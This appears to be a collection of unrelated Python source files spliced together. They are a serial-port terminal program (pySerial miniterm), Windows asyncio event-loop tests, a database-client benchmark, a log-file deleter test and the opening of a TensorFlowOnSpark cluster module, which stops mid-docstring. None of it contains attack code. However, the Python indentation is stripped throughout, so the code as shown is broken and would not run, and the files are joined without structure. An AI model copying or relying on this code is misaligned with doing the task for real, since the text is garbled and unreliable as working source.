"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
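    # Incremental codecs are used so multi-byte sequences that arrive split across successive
    # serial reads are buffered and decoded correctly rather than mangled mid-sequence.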
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':                          # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
test_windows_events.py
|
import os
import signal
import socket
import sys
import time
import threading
import unittest
from unittest import mock
if sys.platform != 'win32':
raise unittest.SkipTest('Windows only')
import _overlapped
import _winapi
import asyncio
from asyncio import windows_events
from test.test_asyncio import utils as test_utils
def tearDownModule():
asyncio.set_event_loop_policy(None)
class UpperProto(asyncio.Protocol):
def __init__(self):
self.buf = []
def connection_made(self, trans):
self.trans = trans
def data_received(self, data):
self.buf.append(data)
if b'\n' in data:
self.trans.write(b''.join(self.buf).upper())
self.trans.close()
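# UpperProto buffers incoming data and, once a newline arrives, writes everything back
# upper-cased and closes the transport; the pipe tests below use it as the server protocol.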
class ProactorLoopCtrlC(test_utils.TestCase):
def test_ctrl_c(self):
def SIGINT_after_delay():
time.sleep(0.1)
signal.raise_signal(signal.SIGINT)
thread = threading.Thread(target=SIGINT_after_delay)
loop = asyncio.new_event_loop()
try:
# only start the loop once the event loop is running
loop.call_soon(thread.start)
loop.run_forever()
self.fail("should not fall through 'run_forever'")
except KeyboardInterrupt:
pass
finally:
self.close_loop(loop)
thread.join()
class ProactorMultithreading(test_utils.TestCase):
def test_run_from_nonmain_thread(self):
finished = False
async def coro():
await asyncio.sleep(0)
def func():
nonlocal finished
loop = asyncio.new_event_loop()
loop.run_until_complete(coro())
# close() must not call signal.set_wakeup_fd()
loop.close()
finished = True
thread = threading.Thread(target=func)
thread.start()
thread.join()
self.assertTrue(finished)
class ProactorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.ProactorEventLoop()
self.set_event_loop(self.loop)
def test_close(self):
a, b = socket.socketpair()
trans = self.loop._make_socket_transport(a, asyncio.Protocol())
f = asyncio.ensure_future(self.loop.sock_recv(b, 100), loop=self.loop)
trans.close()
self.loop.run_until_complete(f)
self.assertEqual(f.result(), b'')
b.close()
def test_double_bind(self):
ADDRESS = r'\\.\pipe\test_double_bind-%s' % os.getpid()
server1 = windows_events.PipeServer(ADDRESS)
with self.assertRaises(PermissionError):
windows_events.PipeServer(ADDRESS)
server1.close()
def test_pipe(self):
res = self.loop.run_until_complete(self._test_pipe())
self.assertEqual(res, 'done')
async def _test_pipe(self):
ADDRESS = r'\\.\pipe\_test_pipe-%s' % os.getpid()
with self.assertRaises(FileNotFoundError):
await self.loop.create_pipe_connection(
asyncio.Protocol, ADDRESS)
[server] = await self.loop.start_serving_pipe(
UpperProto, ADDRESS)
self.assertIsInstance(server, windows_events.PipeServer)
clients = []
for i in range(5):
stream_reader = asyncio.StreamReader(loop=self.loop)
protocol = asyncio.StreamReaderProtocol(stream_reader,
loop=self.loop)
trans, proto = await self.loop.create_pipe_connection(
lambda: protocol, ADDRESS)
self.assertIsInstance(trans, asyncio.Transport)
self.assertEqual(protocol, proto)
clients.append((stream_reader, trans))
for i, (r, w) in enumerate(clients):
w.write('lower-{}\n'.format(i).encode())
for i, (r, w) in enumerate(clients):
response = await r.readline()
self.assertEqual(response, 'LOWER-{}\n'.format(i).encode())
w.close()
server.close()
with self.assertRaises(FileNotFoundError):
await self.loop.create_pipe_connection(
asyncio.Protocol, ADDRESS)
return 'done'
def test_connect_pipe_cancel(self):
exc = OSError()
exc.winerror = _overlapped.ERROR_PIPE_BUSY
with mock.patch.object(_overlapped, 'ConnectPipe',
side_effect=exc) as connect:
coro = self.loop._proactor.connect_pipe('pipe_address')
task = self.loop.create_task(coro)
# check that it's possible to cancel connect_pipe()
task.cancel()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(task)
def test_wait_for_handle(self):
event = _overlapped.CreateEvent(None, True, False, None)
self.addCleanup(_winapi.CloseHandle, event)
# Wait for unset event with 0.5s timeout;
# result should be False at timeout
fut = self.loop._proactor.wait_for_handle(event, 0.5)
start = self.loop.time()
done = self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertEqual(done, False)
self.assertFalse(fut.result())
# bpo-31008: Tolerate only 450 ms (at least 500 ms expected),
# because of bad clock resolution on Windows
self.assertTrue(0.45 <= elapsed <= 0.9, elapsed)
_overlapped.SetEvent(event)
# Wait for set event;
# result should be True immediately
fut = self.loop._proactor.wait_for_handle(event, 10)
start = self.loop.time()
done = self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertEqual(done, True)
self.assertTrue(fut.result())
self.assertTrue(0 <= elapsed < 0.3, elapsed)
# asyncio issue #195: cancelling a done _WaitHandleFuture
# must not crash
fut.cancel()
def test_wait_for_handle_cancel(self):
event = _overlapped.CreateEvent(None, True, False, None)
self.addCleanup(_winapi.CloseHandle, event)
# Wait for unset event with a cancelled future;
# CancelledError should be raised immediately
fut = self.loop._proactor.wait_for_handle(event, 10)
fut.cancel()
start = self.loop.time()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertTrue(0 <= elapsed < 0.1, elapsed)
# asyncio issue #195: cancelling a _WaitHandleFuture twice
# must not crash
fut = self.loop._proactor.wait_for_handle(event)
fut.cancel()
fut.cancel()
def test_read_self_pipe_restart(self):
# Regression test for https://bugs.python.org/issue39010
# Previously, restarting a proactor event loop in certain states
# would lead to spurious ConnectionResetErrors being logged.
self.loop.call_exception_handler = mock.Mock()
# Start an operation in another thread so that the self-pipe is used.
# This is theoretically timing-dependent (the task in the executor
# must complete before our start/stop cycles), but in practice it
# seems to work every time.
f = self.loop.run_in_executor(None, lambda: None)
self.loop.stop()
self.loop.run_forever()
self.loop.stop()
self.loop.run_forever()
# Shut everything down cleanly. This is an important part of the
# test - in issue 39010, the error occurred during loop.close(),
# so we want to close the loop during the test instead of leaving
# it for tearDown.
#
# First wait for f to complete to avoid a "future's result was never
# retrieved" error.
self.loop.run_until_complete(f)
# Now shut down the loop itself (self.close_loop also shuts down the
# loop's default executor).
self.close_loop(self.loop)
self.assertFalse(self.loop.call_exception_handler.called)
class WinPolicyTests(test_utils.TestCase):
def test_selector_win_policy(self):
async def main():
self.assertIsInstance(
asyncio.get_running_loop(),
asyncio.SelectorEventLoop)
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(
asyncio.WindowsSelectorEventLoopPolicy())
asyncio.run(main())
finally:
asyncio.set_event_loop_policy(old_policy)
def test_proactor_win_policy(self):
async def main():
self.assertIsInstance(
asyncio.get_running_loop(),
asyncio.ProactorEventLoop)
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(
asyncio.WindowsProactorEventLoopPolicy())
asyncio.run(main())
finally:
asyncio.set_event_loop_policy(old_policy)
if __name__ == '__main__':
unittest.main()
|
bench_db_client.py
|
import argparse
import logging
import multiprocessing
import os
import pathlib
import random
import signal
import sys
import tempfile
import time
from eth.db.backends.level import LevelDB
from trinity.db.manager import (
DBManager,
DBClient,
)
logger = logging.getLogger('trinity.scripts.benchmark')
logger.setLevel(logging.INFO)
handler_stream = logging.StreamHandler(sys.stderr)
handler_stream.setLevel(logging.INFO)
logger.addHandler(handler_stream)
def random_bytes(num):
return random.getrandbits(8 * num).to_bytes(num, 'little')
def run_server(ipc_path):
with tempfile.TemporaryDirectory() as db_path:
db = LevelDB(db_path=db_path)
manager = DBManager(db)
with manager.run(ipc_path):
try:
manager.wait_stopped()
except KeyboardInterrupt:
pass
ipc_path.unlink()
def run_client(ipc_path, client_id, num_operations):
key_values = {
random_bytes(32): random_bytes(256)
for i in range(num_operations)
}
db_client = DBClient.connect(ipc_path)
start = time.perf_counter()
for key, value in key_values.items():
db_client.set(key, value)
db_client.get(key)
end = time.perf_counter()
duration = end - start
logger.info(
"Client %d: %d get-set per second",
client_id,
num_operations / duration,
)
parser = argparse.ArgumentParser(description='Database Manager Benchmark')
parser.add_argument(
'--num-clients',
type=int,
required=False,
default=1,
help=(
"Number of concurrent clients that should access the database"
),
)
parser.add_argument(
'--num-operations',
type=int,
required=False,
default=10000,
help=(
"Number of set+get operations that should be performed for each client"
),
)
if __name__ == '__main__':
args = parser.parse_args()
logger.info(
"Running database manager benchmark:\n - %d client(s)\n - %d get-set operations\n*****************************\n", # noqa: E501
args.num_clients,
args.num_operations,
)
with tempfile.TemporaryDirectory() as ipc_base_dir:
ipc_path = pathlib.Path(ipc_base_dir) / 'db.ipc'
server = multiprocessing.Process(target=run_server, args=[ipc_path])
clients = [
multiprocessing.Process(
target=run_client,
args=(ipc_path, client_id, args.num_operations),
) for client_id in range(args.num_clients)
]
server.start()
for client in clients:
client.start()
for client in clients:
client.join(600)
os.kill(server.pid, signal.SIGINT)
server.join(1)
logger.info('\n')
|
test_deleter.py
|
import os
import time
import threading
import unittest
from collections import namedtuple
import selfdrive.loggerd.deleter as deleter
from common.timeout import Timeout, TimeoutException
from selfdrive.loggerd.tests.loggerd_tests_common import UploaderTestCase
Stats = namedtuple("Stats", ['f_bavail', 'f_blocks', 'f_frsize'])
class TestDeleter(UploaderTestCase):
def fake_statvfs(self, d):
return self.fake_stats
def setUp(self):
self.f_type = "fcamera.hevc"
super(TestDeleter, self).setUp()
self.fake_stats = Stats(f_bavail=0, f_blocks=10, f_frsize=4096)
deleter.os.statvfs = self.fake_statvfs
deleter.ROOT = self.root
def start_thread(self):
self.end_event = threading.Event()
self.del_thread = threading.Thread(target=deleter.deleter_thread, args=[self.end_event])
self.del_thread.daemon = True
self.del_thread.start()
def join_thread(self):
self.end_event.set()
self.del_thread.join()
def test_delete(self):
f_path = self.make_file_with_data(self.seg_dir, self.f_type, 1)
self.start_thread()
with Timeout(5, "Timeout waiting for file to be deleted"):
while os.path.exists(f_path):
time.sleep(0.01)
self.join_thread()
self.assertFalse(os.path.exists(f_path), "File not deleted")
def test_delete_files_in_create_order(self):
f_path_1 = self.make_file_with_data(self.seg_dir, self.f_type)
time.sleep(1)
self.seg_num += 1
self.seg_dir = self.seg_format.format(self.seg_num)
f_path_2 = self.make_file_with_data(self.seg_dir, self.f_type)
self.start_thread()
with Timeout(5, "Timeout waiting for file to be deleted"):
while os.path.exists(f_path_1) and os.path.exists(f_path_2):
time.sleep(0.01)
self.join_thread()
self.assertFalse(os.path.exists(f_path_1), "Older file not deleted")
self.assertTrue(os.path.exists(f_path_2), "Newer file deleted before older file")
def test_no_delete_when_available_space(self):
f_path = self.make_file_with_data(self.seg_dir, self.f_type)
block_size = 4096
available = (10 * 1024 * 1024 * 1024) / block_size # 10GB free
self.fake_stats = Stats(f_bavail=available, f_blocks=10, f_frsize=block_size)
self.start_thread()
try:
with Timeout(2, "Timeout waiting for file to be deleted"):
while os.path.exists(f_path):
time.sleep(0.01)
except TimeoutException:
pass
finally:
self.join_thread()
self.assertTrue(os.path.exists(f_path), "File deleted with available space")
def test_no_delete_with_lock_file(self):
f_path = self.make_file_with_data(self.seg_dir, self.f_type, lock=True)
self.start_thread()
try:
with Timeout(2, "Timeout waiting for file to be deleted"):
while os.path.exists(f_path):
time.sleep(0.01)
except TimeoutException:
pass
finally:
self.join_thread()
self.assertTrue(os.path.exists(f_path), "File deleted when locked")
if __name__ == "__main__":
unittest.main()
|
TFCluster.py
|
# Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the Tensorflow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import sys
import threading
import time
from pyspark.streaming import DStream
from . import reservation
from . import TFManager
from . import TFSparkNode
# status of TF background job
tf_status = {}
class InputMode(object):
"""Enum for the input modes of data feeding."""
TENSORFLOW = 0 #: TensorFlow application is responsible for reading any data.
SPARK = 1 #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
sc = None #: SparkContext
defaultFS = None #: Default FileSystem string, e.g. ``file://`` or ``hdfs://<namenode>/``
working_dir = None #: Current working directory
num_executors = None #: Number of executors in the Spark job (and therefore, the number of nodes in the TensorFlow cluster).
nodeRDD = None #: RDD representing the nodes of the cluster, i.e. ``sc.parallelize(range(num_executors), num_executors)``
cluster_id = None #: Unique ID for this cluster, used to invalidate state for new clusters.
cluster_info = None #: Cluster node reservations
cluster_meta = None #: Cluster metadata dictionary, e.g. cluster_id, defaultFS, reservation.Server address, etc.
input_mode = None #: TFCluster.InputMode for this cluster
queues = None #: *INTERNAL_USE*
server = None #: reservation.Server for this cluster
def train(self, dataRDD, num_epochs=0, qname='input'):
"""*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
for more details.
Args:
:dataRDD: input data as a Spark RDD.
:num_epochs: number of times to repeat the dataset during training.
:qname: *INTERNAL USE*.
"""
logging.info("Feeding training data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
assert(num_epochs >= 0)
if isinstance(dataRDD, DStream):
# Spark Streaming
dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname)))
else:
# Spark RDD
# if num_epochs unspecified, pick an arbitrarily "large" number for now
# TODO: calculate via dataRDD.count() / batch_size / max_steps
if num_epochs == 0:
num_epochs = 10
rdds = [dataRDD] * num_epochs
unionRDD = self.sc.union(rdds)
unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname))
def inference(self, dataRDD, qname='input'):
"""*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
Args:
:dataRDD: input data as a Spark RDD
:qname: *INTERNAL_USE*
